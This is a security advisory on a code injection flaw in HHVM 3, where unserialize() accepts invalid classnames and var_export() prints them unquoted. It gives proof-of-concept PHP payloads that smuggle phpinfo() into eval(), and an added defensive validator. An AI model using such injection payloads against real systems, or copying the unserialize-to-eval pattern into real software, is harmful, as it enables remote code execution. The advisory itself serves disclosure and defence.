pch-015.md

February 16, 2015

Code Injection Vulnerability via unserialize() Function and var_export() Function in HHVM 3

Taoguang Chen <@chtg> - 2014.10.29

HHVM 3's var_export() function mishandles an object of an undefined class (an __PHP_Incomplete_Class), and its unserialize() function accepts an invalid classname that PHP rejects. Together the two bugs allow code injection wherever var_export() output derived from unserialized data is passed to eval().

HHVM's var_export() function

HHVM 3's var_export() function prints the stored classname, unquoted, instead of __PHP_Incomplete_Class when exporting an object of an undefined class:

<?php

$str = 'O:7:"phpinfo":0:{}';
$obj = unserialize($str);
var_dump($obj);
var_export($obj);

Output in PHP >= 5.1:

object(__PHP_Incomplete_Class)#1 (1) {
  ["__PHP_Incomplete_Class_Name"]=>
  string(7) "phpinfo"
}
__PHP_Incomplete_Class::__set_state(array(
   '__PHP_Incomplete_Class_Name' => 'phpinfo',
))

Output in HHVM 3 (note the bare "phpinfo" used as the class name):

object(__PHP_Incomplete_Class)#1 (1) {
  ["__PHP_Incomplete_Class_Name"]=>
  string(7) "phpinfo"
}
phpinfo::__set_state(array(
))

HHVM's unserialize() function

HHVM 3's unserialize() function does not validate the classname when unserializing an object. PHP stops at the first byte that is not valid in a classname (here the "(" at offset 13) and returns false; HHVM 3 accepts the whole string as the class name:

<?php

$str = 'O:12:"phpinfo();/*":0:{}';
$obj = unserialize($str);
var_dump($obj);

Output in PHP >= 5.1:

Notice: unserialize(): Error at offset 13 of 24 bytes in ...
bool(false)

Output in HHVM 3:

object(__PHP_Incomplete_Class)#1 (1) {
  ["__PHP_Incomplete_Class_Name"]=>
  string(12) "phpinfo();/*"
}

Code Injection Vulnerability

Combining these two bugs, it is possible to inject arbitrary code. The code below shows a dangerous pattern: untrusted input is unserialized and the var_export() output is passed to eval(). On HHVM 3 the attacker-controlled classname lands unquoted in the evaluated source:

<?php

$str = 'O:12:"phpinfo();/*":0:{}';
$obj = unserialize($str);
// var_export($obj);
eval('$str = ' . var_export($obj, true) . ';');

Output in HHVM 3 (the commented lines show the var_export() output that eval() received; everything after "/*" is a comment, so phpinfo() runs and prints its report, which begins with "HipHop"):

// phpinfo();/*::__set_state(array(
// ))
// ok! phpinfo() function executed:)
HipHop
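A defensive counterpart, added here as an example and not part of the original advisory: a pre-check that rejects serialized input whose object classnames contain bytes PHP's unserialize() would refuse (the check HHVM 3 skipped), and a guard that refuses to hand an __PHP_Incomplete_Class to var_export()/eval(). The function names and the three payloads are constructed for this example; the accepted byte set mirrors the strspn() check in PHP 5's ext/standard/var_unserializer.re as understood by the editor, not code copied from PHP or HHVM.

```php
<?php
// Added example, not from the original advisory. Function names are
// hypothetical. Written for PHP 5.3+; it should behave the same on HHVM.

/**
 * Return the byte offset of the first invalid classname character in any
 * object header ('O:<len>:"<name>":' or 'C:<len>:"<name>":') found in
 * $serialized, or null if every classname is acceptable.
 *
 * The accepted set [0-9A-Za-z_\] plus bytes 0x7f-0xff mirrors the strspn()
 * check in PHP 5's unserialize(), which HHVM 3 lacked. The header scan is
 * deliberately naive: a header that merely appears inside a serialized string
 * value is checked too, so harmless input can be rejected, but a bad
 * classname is never accepted (fail closed).
 */
function first_bad_classname_offset($serialized)
{
    $valid = '0123456789_abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\\'
           . implode('', array_map('chr', range(0x7f, 0xff)));
    $pos = 0;
    while (preg_match('/[OC]:(\d+):"/', $serialized, $m, PREG_OFFSET_CAPTURE, $pos)) {
        $len   = (int) $m[1][0];
        $start = $m[0][1] + strlen($m[0][0]);   // first byte of the classname
        $name  = (string) substr($serialized, $start, $len);
        if ($len === 0 || strlen($name) !== $len) {
            return $start;                      // empty or truncated classname
        }
        $good = strspn($name, $valid);
        if ($good !== $len) {
            return $start + $good;              // first byte PHP would reject
        }
        $pos = $start + $len;
    }
    return null;
}

/**
 * True if $value is, or contains (in arrays or object properties), an
 * __PHP_Incomplete_Class, i.e. an object whose class was undefined at
 * unserialize() time. That is the object HHVM 3's var_export() prints with
 * the stored classname unquoted. Nesting is capped so that R:/r: reference
 * cycles cannot recurse forever; absurd depth is treated as unsafe.
 */
function contains_incomplete_class($value, $depth = 0)
{
    if ($value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    if ($depth > 64) {
        return true;                            // fail closed on cycles/deep nesting
    }
    if (is_array($value) || is_object($value)) {
        foreach ((array) $value as $child) {
            if (contains_incomplete_class($child, $depth + 1)) {
                return true;
            }
        }
    }
    return false;
}

/**
 * Unserialize untrusted input only when every classname passes PHP's own
 * check, and refuse to return anything var_export() would print as a bare
 * classname. This removes the two HHVM 3 triggers; it does not make
 * eval(var_export(...)) on untrusted data a good idea.
 */
function safe_unserialize_for_export($serialized)
{
    $bad = first_bad_classname_offset($serialized);
    if ($bad !== null) {
        throw new InvalidArgumentException(
            'invalid classname at offset ' . $bad . ' of ' . strlen($serialized) . ' bytes');
    }
    $value = @unserialize($serialized);         // notices suppressed; false handled here
    if ($value === false && $serialized !== 'b:0;') {
        throw new InvalidArgumentException('malformed serialized data');
    }
    if (contains_incomplete_class($value)) {
        throw new UnexpectedValueException('refusing to export an __PHP_Incomplete_Class');
    }
    return $value;
}

// Constructed inputs: the advisory's two payloads plus a benign array.
$payloads = array('O:7:"phpinfo":0:{}', 'O:12:"phpinfo();/*":0:{}', 'a:1:{s:1:"k";i:1;}');
foreach ($payloads as $payload) {
    try {
        $value = safe_unserialize_for_export($payload);
        echo 'ok: ' . var_export($value, true) . "\n";
    } catch (Exception $e) {
        echo get_class($e) . ': ' . $e->getMessage() . "\n";
    }
}
```

The first payload is rejected after unserialize() because "phpinfo" is not a defined class and the result is an __PHP_Incomplete_Class; the second is rejected before unserialize() with "invalid classname at offset 13 of 24 bytes", the same offset PHP itself reports; the third is exported normally. On PHP 7.0 and later, unserialize($s, array('allowed_classes' => false)) turns every object into an __PHP_Incomplete_Class without running any class code, which is the right default for untrusted input, but it does not by itself make the var_export()-to-eval() pattern safe, since the incomplete-class object is exactly what HHVM 3 printed unquoted.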